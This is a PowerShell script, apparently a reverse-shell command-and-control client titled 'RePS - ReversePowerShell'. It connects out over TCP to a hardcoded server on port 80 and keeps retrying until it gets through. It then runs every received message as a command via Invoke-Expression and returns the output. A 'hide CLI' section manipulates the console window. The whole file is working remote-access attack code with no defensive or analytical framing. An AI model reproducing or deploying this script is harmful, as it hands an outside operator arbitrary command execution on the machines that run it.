﻿##### Scriptinfo ##################################################################################
# Scriptreihe:      RePS - ReversePowerShell::CC-Client(FULL)
# Datum:            2018-05-11
# Version:          V1.05
# Programmierer:    Stephan Walther
###################################################################################################

# Variablen
    $ServerName     = 'intern.ws-its.de' 
    $Port           = '80'
    $OutputEnabled  = $true
    
# hide CLI
    Add-Type -Name Window -Namespace Console -MemberDefinition "[DllImport(""Kernel32.dll"")]`r`npublic static extern IntPtr GetConsoleWindow();`r`n[DllImport(""user32.dll"")]`r`npublic static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);"
    $consolePtr = [Console.Window]::GetConsoleWindow()
    [Console.Window]::ShowWindow($consolePtr, 5) | Out-Null

# Output-Function
    function write-CCHost {
        param($Message,$FontColor = 'cyan')
        if ($OutputEnabled) { Write-Host "$Message" -ForegroundColor $FontColor } 
    }

# start CC-Session      
    $SourcePort = Get-Random -Minimum 48086 -Maximum 53042
    $Endpoint   = New-Object System.Net.IPEndpoint ([ipaddress]::any,$SourcePort) 
    $TcpClient  = [Net.Sockets.TCPClient]$Endpoint

    write-CCHost -Message "connecting to CC-Server $($ServerName):$($Port) via TCP"
    do {
        try {
            $TcpClient.Connect($ServerName,$Port)            
        } 
        catch {            
            Start-Sleep -Seconds 1            
        }
    } while ($TcpClient.Connected -eq $false)
    write-CCHost -Message "connection to CC-Server established :-)" -FontColor Green

    $TcpStream = $TcpClient.GetStream()

# receiving-loop
    $loop = $true
        
    do {        
        if ($TcpStream.DataAvailable) {
            $Message = ""  
            do {    
                [byte[]]$byte = New-Object byte[] 64512
                $byteCount = $TcpStream.read($byte, 0, $byte.Length)
                $Message += [text.encoding]::ASCII.GetString( (1..$byteCount | ForEach-Object { $byte[$_-1] } ) )
            } while ($TcpStream.DataAvailable)
                                
            try {                                   
                $MessageLines = $Message -split "`r`n"

                if ($MessageLines.count -gt 1) {
                    write-CCHost -Message "incoming command: $(($MessageLines[0].trim() + $MessageLines[1].trim()) -replace '{' )" 
                } else {
                    write-CCHost -Message "incoming command: $Message" 
                }                
                                                                    
                $Result = Invoke-Expression -Command $Message -ErrorAction SilentlyContinue

                if ($Result -eq $null) { 
                    $Result = 'success' 
                } else {
                    $Result = ($Result | out-string) -join "`r`n"
                }

                if ($Message -eq 'close-connection') {
                    $loop = $false
                } else {
                    $Data = [text.Encoding]::Ascii.GetBytes($Result)
                    $TcpStream.Write($Data,0,$Data.length)
                }
            }
            catch {
                $Fehler = $error[0].Exception.Message
                write-CCHost -Message "sending error: $Fehler" -FontColor Magenta                     
                $Data = [text.Encoding]::Ascii.GetBytes($Fehler)
                $TcpStream.Write($Data,0,$Data.length)
            }            
        } else {            
            Start-Sleep -Milliseconds 100
        }
    } while ($loop -eq $true)